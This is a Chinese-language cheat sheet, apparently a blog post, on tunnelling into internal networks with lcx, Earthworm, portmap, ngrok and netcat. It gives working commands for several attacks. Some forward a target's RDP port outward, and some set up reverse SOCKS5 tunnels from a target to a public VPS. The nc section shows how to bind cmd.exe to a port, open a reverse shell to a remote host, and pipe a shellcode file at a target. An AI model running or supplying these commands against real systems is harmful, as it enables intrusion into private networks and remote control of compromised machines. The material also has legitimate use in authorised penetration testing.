windows
1.lcx
lcx.exe 使用教程:
监听1234端口,转发数据到2333端口
本地:
lcx.exe -listen 1234 2333
将目标的3389转发到本地的1234端口
远程:lcx.exe -slave ip 1234 127.0.0.1:3389
查看项目源码:https://github.com/henang/Intranet-Penetration/blob/master/tools/lcx
2.EW
Earthworm http://rootkiter.com/Termite/
0x01 正向 SOCKS5 服务器
当目标网络边界存在公网 IP 且可任意开监听端口
ew_for_Win.exe -s ssocksd -l 8888
上述命令是在该机器开启一个 8888 的正向连接端口。然后其它主机可通过设置代理为 192.168.153.140:8888 添加这个代理
0x02 反弹 SOCKS5 服务器
当目标网络边界不存在公网 IP,通过反弹方式创建 socks 代理。先在一台具有公网 ip 的主机 A 上运行以下命令
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
意思是在我们公网 VPS 上添加一个转接隧道,把 1080 端口收到的代理请求转交给 8888 端口
在目标主机 B 上启动 SOCKS5 服务 并反弹到公网主机的 8888 端口
ew_for_Win.exe -s rssocks -d 公网Aip -e 8888
然后通过添加公网A ip:1080 这个代理, 来访问机器B内网
linux
1.portmap
监听1234端口,转发数据到2333端口
本地:
./portmap -m 2 -p1 1234 -p2 2333
将目标的3389转发到本地的1234端口
./portmap -m 1 -p1 3389 -h2 ip -p2 1234
windows&&linux
1.ngrok
官方给出了使用方法
视频教程:http://compaign.tudou.com/v/658801319.html?
2. nc
作者:Hobbit && Chris Wysopal
网址:http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10 NT]
基本用法:
大概有以下几种用法:
1.连接到REMOTE主机,例子:
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
2.监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3.扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4.REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5.REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,
当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。
高级用法:
6.作攻击程序用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
讲解:连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)
附:c:exploit.txt为shellcode等
连接工具
1.reGeorg
2.Proxifier
3.proxychains
本文作者为Mr.Bai,转载请注明。